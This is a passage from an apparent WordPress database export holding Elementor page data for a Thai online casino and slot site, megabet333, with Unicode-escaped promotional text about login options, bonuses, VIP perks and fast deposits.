\\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1029,133,'_thumbnail_id','60'),(1030,133,'_elementor_edit_mode','builder'),(1031,133,'_elementor_template_type','wp-page'),(1032,133,'_elementor_version','3.32.5'),(1033,133,'_elementor_pro_version','3.32.3'),(1034,133,'_wp_page_template','default'),(1035,133,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1036,133,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a 